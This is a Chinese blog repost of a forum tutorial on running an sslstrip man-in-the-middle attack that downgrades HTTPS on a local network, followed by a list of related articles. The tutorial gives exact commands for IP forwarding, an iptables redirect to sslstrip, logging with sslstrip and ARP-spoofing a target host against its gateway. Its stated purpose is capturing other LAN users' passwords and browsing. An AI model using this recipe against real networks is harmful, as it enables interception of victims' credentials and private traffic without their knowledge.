运用sslstrip进行中间人攻击(Bypass https)

最新推荐文章于 2024-07-15 14:32:14 发布
最新推荐文章于 2024-07-15 14:32:14 发布
阅读量1.5k 收藏 3
点赞数
文章标签: redirect python 测试 bt html 工具

运用sslstrip进行中间人攻击(Bypass https)
文章作者:kevin2600

邪八新人第一帖! 这是我以前在anywlan发过的一帖子, 现转到这来测试下! 要是发错地方请指正.

大家都知在内网进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了OpenSSL的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.

此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.

用法分为以下几步:

1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.

2) 用命令 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http数据导入sslstrip.

3) 运行 sslstrip -a -w ssllog (写入文本)

4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)

接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正!

Kevin2600

下载:

sslstrip-0.2.tar.gz

cnbird2008
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java ssl 中间人攻击_利用SSLstrip进行中间人攻击
weixin_29035405的博客
02-27 538
利用SSLstrip进行中间人攻击很多人都知在内网进行中间人攻击手段使得攻击者更有效地截获内网用户的暗码及窃密动态。在BackTrack情况下应用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS如许用了OpenSSL的就没体例了….. 直到刚在US举办的black hat 200...
SSLtrip攻击解决方案
cnbird's blog
04-03 1387
由于目前一种专门针对SSLHTTPS的新型攻击工具在网上广泛传播,严重影响SSL/HTTPS所保护的用户身份等敏感信息数据的安全性。鉴于我国重要信息系统广泛使用SSL/HTTPS技术用于敏感信息传输保护,为防止重大安全事件发生,很多信息安全监管机构纷纷发文要求进一步推进等级保护安全整改、建设工作,如深圳市公安局的《深圳公安局公共信息网络安全监察分局文件》(深公网[2009]86号发文)。脉山龙有
SSLStrip-基于mitmproxy
最新发布
weixin_51031096的博客
07-15 683
拦截下的数据可摁enter进入详细页面,接着摁e进行修改,摁e弹出可修改的参数,选中参数后摁enter可进入修改界面,在第一行修改/添加值即可,之后摁esc再摁q返回之前的详细页面,之后摁a恢复请求,此时表示服务端已收到当前请求并对修改后的请求返回响应。此时摁方向键进入Response界面然后摁e以同样的方式修改数据,修改完成后 摁 ctrl + x 进行保存然后输入y 再摁 enter 进行退出,之后再摁 a 即可将请求发送给客户端。网卡> <靶机IP> <网关地址>
HTTPS post: bypass SSL security check and trust all the hosts
I am Peter Chen
10-25 1753
import com.eviware.soapui.model.testsuite.TestRunContext; import javax.net.ssl.* import java.net.URL import java.net.URLEncoder import java.net.CookieHandler; import java.net.CookieManager; import j
如何用kali Linux进行DNS欺骗、窃取cookies,使用SSLstrip
热门推荐
huxdl的博客
12-24 1万+
由于入侵检测这门课要做PPT讲解,所以我研究了一下Kali linux上的一些实验,首先介绍一下kali linux: 按照官方网站的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版。作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用。也可称之为平台或者框架。集成超过300个渗透测试工具。(
针对SSL中间人攻击演示和防范
hellotjc的专栏
01-12 1385
1 中间人攻击概述 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且在今天仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 随着计算机通信网技术的不断发展,MITM攻击也越来越多样
SSLstrip0.9
10-11
著名的SSL中间人攻击工具SSLstrip最新版0.9版
sslstrip-master.zip
03-17
SSLStrip是一款强大的网络安全工具,主要用于演示和检测中间人攻击(Man-in-the-Middle,MITM)中的SSL/TLS降级攻击。这个工具是由Moxie Marlinspike开发的,他在2009年的Black Hat安全会议上首次展示了这个工具。在...
sslstrip:一种实现SSL剥离攻击的MITM工具
05-08
跳线这是一种工具,可实现用Go编写的Moxie Marlinspike的SSL剥离攻击。 受启发。要求唯一的要求是Go。 没有其他依赖关系,只有该语言的标准库。 我们已经使用了1.9.2版的Go,但是它也可以与其他版本一起使用。 如果...
Juli:用于 MiTM(中间人)攻击的简单自动化 perl 脚本
06-23
巨力用于 MiTM(中间人)攻击的简单自动化 perl 脚本。 我今天早上创建它只是为了打发时间:)要求: Linux(我在 Ubuntu 14.04 LTS 上测试过) 珀尔sslstrip arpsoof(来自 dsniff 可以在这里找到 )用法: 脚本必须...
SSLstrip0.2分析与测试
02-20
其中,SSLstrip 就是一款专为针对 SSL 加密通信进行嗅探的工具,它能够通过中间人攻击的方式拦截并篡改 HTTPS 流量,从而实现对用户隐私数据的窃取。SSLstrip 0.2 版本的出现,更是加强了其功能性和稳定性,成为了...
kali linux 中间人攻击
cg_sss的博客
05-21 1315
中间人攻击(Man-in-the-Middle Attack, MITM),是指攻击者跟受害者分别建立独立连接的一种入侵式攻击。最常出现于主机系统之间。
Bypass-分流抢票
weixin_30905133的博客
01-26 407
Bypass-分流抢票 https://www.bypass.cn/ 转载于:https://www.cnblogs.com/hglibin/p/10324821.html
URL跳转漏洞bypass小结
飞空静渡
05-15 1万+
转自:https://landgrey.me/open-redirect-bypass/下面是owasp对URL跳转漏洞,也叫开放重定向漏洞(open redirect)的一段描述:Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cau...
【实战】用 Python 实现中间人攻击
weixin_48923393的博客
02-13 3902
文 |豆豆来源:Python 技术「ID: pythonall」中间人攻击,顾名思义,就是客户端和服务端的通信被第三者拦截了,这样通信双方的通信内容就会被窃听。你可能会认为,没关系啊,窃...
使用Charles进行HTTPS抓包及常见问题
09-29 2039
Charles下载地址:https://www.charlesproxy.com/download/ 第一步:配置HTTP代理,设置代理:主界面--Proxy--Proxy Settings 选择在8888端口上监听,然后确定。勾选了SOCKS proxy,还能截获到浏览器的http访问请求。 第二步:配置SSL代理: 首先在charles的 Proxy选项选择SSL Prox...
基于SSLStripHTTPS会话劫持
realmeh的专栏
12-29 2274
0 引言 HTTPS作为一种安全的HTTP数据传输协议,被广泛应用于万维网上敏感信息的通信,例如交易支付等方面。然而,HTTPS也存在自身的缺陷,不能绝对保证服务端自身的安全。在网络攻防中,威胁服务器安全的行为时有发生,最常见的例子就是使用模仿银行域名的钓鱼攻击(Phishing)。随着HTTPS的广泛使用,一些新的针对HTTPS会话的劫持也开始出现,如基于中间人攻击的Surf Jacking、
wifi攻击pineapple之SSL:轻松拿到JD密码
坚果技术基地
06-28 6218
虽说tcpdump可以把经过的数据都给dump出来,但是遇到加密的数据是无法查看到内容的,https就是一个典型的例子。那么如何把https的数据包解密读取呢?这回给大家讲解一下 sslstrip 截获https的例子。 (注:仅供攻防演练和安全防护,严禁用于非法目的)   1、在使用之前我们先看一下帮助选项,确定有哪些可用参数。在终端里面直接输入“sslstri
【流量劫持】SSLStrip 的未来 —— HTTPS 前端劫持
06-12
对于SSLStrip这种 HTTPS 中间人攻击工具,随着越来越多的网站采用了 HTTPS 加密技术,它的作用已经被大大降低。但是,一些黑客仍然会使用类似的工具进行前端劫持攻击,其原理是通过将 HTTPS 网站中的一些资源(如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值